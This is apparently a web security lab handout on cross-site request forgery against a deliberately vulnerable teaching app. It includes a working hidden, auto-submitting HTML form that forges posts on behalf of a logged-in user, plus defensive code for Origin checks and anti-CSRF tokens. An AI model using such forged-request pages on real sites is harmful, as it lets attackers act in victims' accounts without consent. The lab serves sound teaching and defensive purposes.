
Cross-Site Request Forgery

A cross-site request occurs when a user interacts with one website via an HTTP request, but that interaction unintentionally triggers an action on a different website. This concept is at the core of the CSRF vulnerability, since the attacker exploits the trust a website places in a user's browser: the browser attaches the user's session cookie to the forged request automatically. By tricking the user into performing unintentional actions, such as transferring funds, changing settings, or submitting forms, the attacker can execute operations on behalf of the authenticated user.

Attack

In this attack you will create a post on behalf of the user mr_robot by abusing the /create_post endpoint. The procedure is the following:

  1. Create a file named index.html on the attacker machine with the following code:

    CSRF Attack Page
    <!DOCTYPE html>
    <html>
        <head>
            <title>Fake Form</title>
        </head>
        <body onload="document.post_request.submit()">
            <form action="http://192.168.0.100/create_post" method="POST" name="post_request" style="display: none;">
                <input type="text" name="content" value="This is a forged post"/>
            </form>
        </body>
    </html>
    
  2. Run an HTTP server on the attacker machine using python3 -m http.server 80.

  3. Start a Wireshark capture on the victim's browser network interface.
  4. Login as mr_robot at Hackergram.
  5. On another tab, access the attacker machine by entering http://192.168.0.10 in the address bar.
  6. Check that the attack was successful, e.g., by searching the posts of mr_robot at Hackergram.
  7. Analyze the HTTP packets exchanged with Hackergram and identify the HTTP packet used for the attack. Check that the session cookie of this packet is the same as the other HTTP packets used in the mr_robot session.
  8. Now logout mr_robot from Hackergram and try the attack again. Was it successful? Why?
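Steps 7 and 8 show why the session cookie alone cannot tell a forged request from a legitimate one: the browser sends the same cookie in both cases, and the attack only fails once that cookie is gone. What does differ is the Origin (or Referer) header the browser adds, which names the page that issued the request. The following added example, which is not part of the lab material, parses a few constructed raw HTTP requests of the kind captured in step 7 and classifies each state-changing request by comparing that header against Hackergram's origin (the 192.168.0.100 address from the form above). The request samples, the cookie name session and the helper names are assumptions for illustration.

```python
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Origin of the site being protected (scheme://host[:port], no path).
SITE_ORIGIN = "http://192.168.0.100"

# Only requests that change state are worth a verdict; GETs are left alone here.
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_cookies(header: str) -> Dict[str, str]:
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def classify(raw: str) -> str:
    """Verdict for one request: ignored, unauthenticated, same-site, cross-site or suspicious."""
    method, _path, headers, _body = parse_request(raw)
    if method not in STATE_CHANGING:
        return "ignored"
    cookies = parse_cookies(headers.get("cookie", ""))
    if "session" not in cookies:
        # Step 8 case: no session cookie, so the server has nobody to act on behalf of.
        return "unauthenticated"
    # Browsers send Origin on cross-site POSTs; fall back to Referer for older clients.
    source = headers.get("origin") or headers.get("referer")
    if source is None:
        return "suspicious: no Origin/Referer"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return "cross-site"
    return "same-site"


# Constructed sample captures: a legitimate post, the forged post from the lab page
# (same session cookie, different Origin), and the forged post after logout.
SAMPLES: List[Tuple[str, str]] = [
    ("legitimate",
     "POST /create_post HTTP/1.1\r\nHost: 192.168.0.100\r\n"
     "Origin: http://192.168.0.100\r\nReferer: http://192.168.0.100/create_post\r\n"
     "Cookie: session=abc123\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
     "content=hello"),
    ("forged, logged in",
     "POST /create_post HTTP/1.1\r\nHost: 192.168.0.100\r\n"
     "Origin: http://192.168.0.10\r\nReferer: http://192.168.0.10/\r\n"
     "Cookie: session=abc123\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
     "content=This+is+a+forged+post"),
    ("forged, logged out",
     "POST /create_post HTTP/1.1\r\nHost: 192.168.0.100\r\n"
     "Origin: http://192.168.0.10\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
     "content=This+is+a+forged+post"),
    ("page view",
     "GET /posts/mr_robot HTTP/1.1\r\nHost: 192.168.0.100\r\nCookie: session=abc123\r\n\r\n"),
]


def classify_samples() -> List[Tuple[str, str]]:
    """Run the classifier over the constructed captures."""
    return [(label, classify(raw)) for label, raw in SAMPLES]


if __name__ == "__main__":
    for label, verdict in classify_samples():
        print(f"{label:20s} -> {verdict}")
```

Origin checking is a useful second line of defence and a practical way to spot forged requests in a capture, but it is not a substitute for anti-CSRF tokens: some clients strip Referer, and a request with neither header cannot be classified with confidence.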

Additional exercise

Hackergram has other endpoints vulnerable to CSRF attacks. It has a total of six vulnerable endpoints, some using GET and others using POST. Explore Hackergram by creating a new user and observing the exchanged traffic when different actions are performed. This can be done using Wireshark or the Web Console of Firefox (Network tab). Based on this analysis, write the HTML code required to perform the attack, and demonstrate that it works.

Countermeasure

To prevent this attack, Hackergram should incorporate the use of anti-CSRF tokens. An anti-CSRF token is a unique, secret, and unpredictable value generated by the server, bound to the user's session, and included in each form submission; a forged request from another site cannot know it. To implement them, the steps are:

  1. On the Hackergram machine, open the views.py file and add the following lines at the start of the file to enable CSRF protection:
    from flask_wtf.csrf import CSRFProtect, generate_csrf
    # app is the Flask application object; it must already be defined above this line
    csrf = CSRFProtect(app)
    
  2. With CSRF protection enabled globally, go to the /create_post function and change its return statement so the render_template call passes the CSRF token to the template:
    return render_template('create_post.html', current_user=user, anti_csrf_token=generate_csrf())
    
  3. The last step is to add the CSRF token as a hidden field of the form in the template of the create-post endpoint (create_post.html). The field must be named csrf_token, which is the form field CSRFProtect validates by default, and its value is the anti_csrf_token variable passed in the previous step:
    <div class="card-body">
        <form action="/create_post" method="post">
            <input type="hidden" name="csrf_token" value="{{ anti_csrf_token }}">
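The three steps above wire up Flask-WTF's implementation of the synchronizer token pattern. To make visible what CSRFProtect does behind the scenes, the following added example (not Hackergram's code, and not using Flask) models the same pattern with the standard library only: a GET of the create-post form mints a random token, stores it in the server-side session and embeds it as the hidden csrf_token field; a POST is accepted only if the submitted field matches the session's token. The in-memory session store, the user name and the function names are assumptions for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Session:
    user: str
    csrf_token: str = ""   # minted lazily, the first time the form is rendered


# Constructed in-memory session store: cookie value -> session data.
SESSIONS: Dict[str, Session] = {}
POSTS: List[Tuple[str, str]] = []


def login(user: str) -> str:
    """Create a session and return the cookie value the browser would store."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = Session(user=user)
    return sid


def render_create_post_form(sid: str) -> str:
    """GET /create_post: bind a fresh token to the session and embed it in the form."""
    session = SESSIONS[sid]
    if not session.csrf_token:
        session.csrf_token = secrets.token_urlsafe(32)   # unpredictable, per session
    return ('<form action="/create_post" method="post">'
            f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
            '<input type="text" name="content"></form>')


def create_post(sid: str, form: Dict[str, str]) -> Tuple[int, str]:
    """POST /create_post: the cookie identifies the user, the token proves the form came from us."""
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "login required"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison on bytes so a malformed submission cannot raise or leak timing.
    if not session.csrf_token or not hmac.compare_digest(
            submitted.encode("utf-8"), session.csrf_token.encode("utf-8")):
        return 400, "The CSRF token is missing or invalid."
    POSTS.append((session.user, form.get("content", "")))
    return 200, "post created"


def extract_token(html: str) -> str:
    """Pull the hidden field value out of the rendered form, as the real browser would submit it."""
    marker = 'name="csrf_token" value="'
    start = html.index(marker) + len(marker)
    return html[start:html.index('"', start)]


def run_demo() -> List[int]:
    """Replay the lab's scenarios and return the HTTP status of each attempt."""
    sid = login("mr_robot")
    token = extract_token(render_create_post_form(sid))
    legitimate = create_post(sid, {"csrf_token": token, "content": "hello"})[0]
    # Forged page: the browser attaches the cookie, but the attacker's form has no token.
    forged = create_post(sid, {"content": "This is a forged post"})[0]
    # A guessed token fails the same way.
    guessed = create_post(sid, {"csrf_token": "x" * 43, "content": "forged"})[0]
    # Step 8 of the attack: logged out, so no session cookie at all.
    logged_out = create_post("", {"content": "forged"})[0]
    return [legitimate, forged, guessed, logged_out]


if __name__ == "__main__":
    print(run_demo())   # [200, 400, 400, 401]
    print(POSTS)
```

The 400 response for a missing or invalid token is the behaviour CSRFProtect gives Hackergram after step 1, and the hidden field in render_create_post_form corresponds to step 3. Setting the session cookie with the SameSite=Lax attribute is a complementary measure that stops most browsers from attaching the cookie to cross-site POSTs in the first place.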